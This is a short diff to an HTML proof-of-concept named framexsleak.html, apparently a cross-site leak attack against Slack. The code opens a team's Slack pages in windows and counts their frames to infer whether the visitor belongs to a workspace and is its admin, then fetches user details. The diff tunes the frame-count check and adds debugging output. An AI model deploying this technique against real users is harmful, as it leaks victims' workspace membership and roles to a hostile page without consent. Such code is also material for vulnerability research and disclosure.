--- a/framexsleak.html
+++ b/framexsleak.html
@@ -73,7 +73,8 @@ window.blocked = false;
             }
 
             var checkAdmin = (teamname, win) => {
-                if(win.frames.length == 1){
+                console.log(win.frames.length);
+                if(win.frames.length >= 1){
                     result.innerHTML += "[+] You are the admin of "+teamname+", below are your details";
                     getUserInfo();
                             
@@ -98,6 +99,7 @@ window.blocked = false;
                 win.location = "https://"+teamname+".slack.com/apps/manage/logs"
 
                 setTimeout(() => {
+                    console.log(win2.frames.length);
                     if(win2.frames.length >= 1){
                             result.innerHTML = "[+] You are the member of "+teamname+", let's check if you are an admin or not<br />";
                             checkAdmin(teamname, win)
